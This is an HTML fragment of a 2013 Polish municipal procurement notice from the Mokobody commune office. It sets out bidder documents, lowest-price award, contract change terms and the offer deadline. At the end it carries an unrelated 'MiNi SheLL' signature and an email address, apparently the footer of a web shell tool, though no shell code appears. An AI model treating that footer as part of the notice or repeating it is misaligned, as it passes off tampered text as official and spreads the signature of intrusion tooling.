<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie o braku podstaw do wykluczenia - według wzoru stanowiącego załącznik Nr 6 do niniejszej SIWZ, dostarczone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają aneksu sporządzonego z zachowaniem 
      formy pisemnej pod rygorem nieważności.
2.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadku gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT).
3.	Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia  jeżeli nastąpi zmiana zakresu usług na skutek ważnych, niezależnych od Zamawiającego przyczyn nie znanych Zamawiającemu w momencie zawarcia umowy,  z odpowiednią zmianą wynagrodzenia. 
4.	Wzór umowy stanowiący załącznik Nr 7 do SIWZ określa istotne dla stron   
       postanowienia, które zostaną wprowadzone do treści zawieranej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mokobody.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Mokobody 
Plac Chreptowicza 25 , 08-124 Mokobody , pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 13:30, miejsce: Urzad Gminy Mokobody 
Plac Chreptowicza 25 , 08-124 Mokobody - pokój nr 7 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com